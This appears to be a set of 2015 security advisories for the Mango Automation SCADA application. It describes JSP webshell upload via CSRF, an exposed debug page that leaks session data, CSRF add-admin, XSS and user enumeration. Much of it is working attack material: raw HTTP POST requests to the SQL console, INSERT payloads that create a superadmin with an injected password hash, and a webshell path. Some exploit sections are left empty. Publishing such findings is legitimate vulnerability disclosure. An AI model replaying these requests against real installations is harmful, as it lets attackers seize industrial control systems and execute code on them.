Mango Automation 2.6.0 CSRF File Upload And Arbitrary JSP Code Execution Vendor: Infinite Automation Systems Inc. Product web page: http://www.infiniteautomation.com/ Affected version: 2.5.2 and 2.6.0 beta (build 327) Summary: Mango Automation is a flexible SCADA, HMI And Automation software application that allows you to view, log, graph, animate, alarm, and report on data from sensors, equipment, PLCs, databases, webpages, etc. It is easy, affordable, and open source. Desc: Mango suffers from an authenticated arbitrary JSP code execution. The vulnerability is caused due to the improper verification of uploaded image files in 'graphicalViewsBackgroundUpload' script via the 'backgroundImage' POST parameter which allows of arbitrary files being uploaded in '/modules/graphicalViews/web/graphicalViewUploads/'. This can be exploited to execute arbitrary JSP code by uploading a malicious JSP script file that will be stored as a sequence number depending on how many files were uploaded (1.jsp or 2.jsp or 3.jsp .. n.jsp). Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit Jetty(9.2.2.v20140723) Java(TM) SE Runtime Environment (build 1.8.0_51-b16) Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5262 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5262.php 20.08.2015 --
Webshell: http://localhost:8080/modules/graphicalViews/web/graphicalViewUploads/17.jsp ################################################################# Mango Automation 2.6.0 CSRF Arbitrary Command Execution Exploit Advisory ID: ZSL-2015-5261 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5261.php 20.08.2015 --
################################################################# Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability Advisory ID: ZSL-2015-5260 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php 20.08.2015 -- One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session): - http://localhost:8080/status/ Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page: - http://localhost/status/mango.json?time=$ - http://localhost/status/ Sample status output: \"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, email=z@s.l, phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n LONG_POLL_DATA_TIMEOUT=1440143583487\r\n LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n constants.Permissions.DataPointAccessTypes.READ=1\r\n org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n constants.DataTypes.BINARY=1\r\n constants.UserComment.TYPE_EVENT=1\r\n constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n Also you can list all of the Classes known to DWR: - http://localhost:8080/dwr/index.html ################################################################# Mango Automation 2.6.0 CSRF Arbitrary SQL Query Execution Advisory ID: ZSL-2015-5259 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5259.php 20.08.2015 -- SQL query in version 2.5.2 (pass 123123) with hash injection: ------------------------------------------------------------- INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','Y','N',1440075860103,'','0','N','','Y'); 1 records(s) updated. SQL query in version 2.6.0 beta build 327 (pass 123123) with hash injection: ---------------------------------------------------------------------------- INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','N',1440075860103,'','0','N','','Y','superadmin'); 1 records(s) updated. USERS table: ID USERNAME PASSWORD EMAIL PHONE DISABLED LASTLOGIN HOMEURL RECEIVEALARMEMAILS RECEIVEOWNAUDITEVENTS TIMEZONE MUTED PERMISSIONS 1. POST /sqlConsole.shtm HTTP/1.1 Host: localhost:8080 Content-Length: 51 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:8080/sqlConsole.shtm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1 sqlString=select+*+from+users%3B&query=Submit+query 2. POST /sqlConsole.shtm HTTP/1.1 Host: localhost:8080 Content-Length: 54 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:8080/sqlConsole.shtm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1 sqlString=select+*+from+users%3B&tables=Get+table+list 3. POST /sqlConsole.shtm HTTP/1.1 Host: localhost:8080 Content-Length: 246 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:8080/sqlConsole.shtm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1 sqlString=INSERT+INTO+USERS+VALUES%289%2C%27gjoko3%27%2C%27YB8YiWZ%2B%2BuuzO4wSVyg12j8Cf3g%3D%27%2C%27gjoko%40z.sl%27%2C%27333222111%27%2C%27Y%27%2C%27N%27%2C1440075860103%2C%27%27%2C%270%27%2C%27N%27%2C%27%27%2C%27Y%27%29%3B&update=Submit+update ################################################################# Mango Automation 2.6.0 CSRF Add Admin Exploit Advisory ID: ZSL-2015-5258 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5258.php 20.08.2015 -- 2.5.2:
2.6.0 beta (build 327):
################################################################# Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability Advisory ID: ZSL-2015-5257 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5257.php 20.08.2015 -- Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability
################################################################# Mango Automation 2.6.0 User Enumeration Weakness Advisory ID: ZSL-2015-5256 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5256.php 20.08.2015 -- Request for non-existent username: ---------------------------------- POST /login.htm HTTP/1.1 Host: localhost:8080 Content-Length: 29 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:8080/login.htm;jsessionid=6zpfpnxljyzf13l3zrpx9e0xd Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd username=noob&password=123123 Response: - User id not found Request for existent username: ------------------------------ POST /login.htm HTTP/1.1 Host: localhost:8080 Content-Length: 32 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:8080/login.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd username=admin&password=123123 Response: - Invalid login